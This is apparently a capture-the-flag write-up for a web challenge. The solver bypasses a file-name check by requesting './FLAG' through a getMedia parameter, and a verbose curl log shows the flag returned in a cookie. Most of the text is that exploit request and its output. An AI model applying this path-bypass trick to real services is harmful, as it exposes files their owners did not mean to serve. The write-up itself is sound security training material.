READ THE FLAG
Category: Web security
100 points
Cannot we store them in a database !?
Challenge Link: https://ch2.sbug.se/
Solution
Under the challenge address there are few words from the author ;-)
But in closer look I’ve realized that I’ve been redirected from the original address.
I’ve investigated the redirection path, which looks like below.
https://ch2.sbug.se/
=> https://ch2.sbug.se/get?getMedia=README
=> https://ch2.sbug.se/read
The /get?getMedia=README
response setups below cookie:
< set-cookie: content="H3llo\012This is my resume.\012I am EXPERT in cyber security\012"; Path=/
which after redirection is displayed under the /read
address.
I’ve played a bit with it until I’ve found that https://ch2.sbug.se/get?getMedia=FLAG
responds with YOU CANNOT GET A
FLAG THAT EASY
message. That’s why I’ve tried below:
curl 'https://ch2.sbug.se/get?getMedia=./FLAG' -v
* Trying 172.67.202.196:443...
* Connected to ch2.sbug.se (172.67.202.196) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
* CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server accepted to use h2
* Server certificate:
* subject: C=US; ST=California; L=San Francisco; O=Cloudflare, Inc.; CN=sni.cloudflaressl.com
* start date: Mar 8 00:00:00 2021 GMT
* expire date: Mar 7 23:59:59 2022 GMT
* subjectAltName: host "ch2.sbug.se" matched cert's "*.sbug.se"
* issuer: C=US; O=Cloudflare, Inc.; CN=Cloudflare Inc ECC CA-3
* SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55901e3ca560)
> GET /get?getMedia=./FLAG HTTP/2
> Host: ch2.sbug.se
> user-agent: curl/7.74.0
> accept: */*
>
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* Connection state changed (MAX_CONCURRENT_STREAMS == 256)!
< HTTP/2 302
< date: Tue, 20 Apr 2021 18:30:57 GMT
< content-type: text/html; charset=utf-8
< set-cookie: __cfduid=d2e8b3c0a2ee3362d38825d94d517a3d51618943457; expires=Thu, 20-May-21 18:30:57 GMT; path=/; domain=
.sbug.se; HttpOnly; SameSite=Lax; Secure
< location: https://ch2.sbug.se/read
< set-cookie: content="SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}\012"; Path=/
< cf-cache-status: DYNAMIC
< cf-request-id: 099225cfc800009d127131b000000001
< expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
< report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YCgCZJN%2BAHTWNQvla1%2B0C32CkovAgJ8ByqWQwd1J
YOV6uj77HqByk1adOR1Dou8j7%2BBTx5Otb%2Bms%2FoIngEhqqwfXhmSRKCTMah6reQ%3D%3D"}],"max_age":604800,"group":"cf-nel"}
< nel: {"report_to":"cf-nel","max_age":604800}
< server: cloudflare
< cf-ray: 6430725faae19d12-AMS
< alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Flag
SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}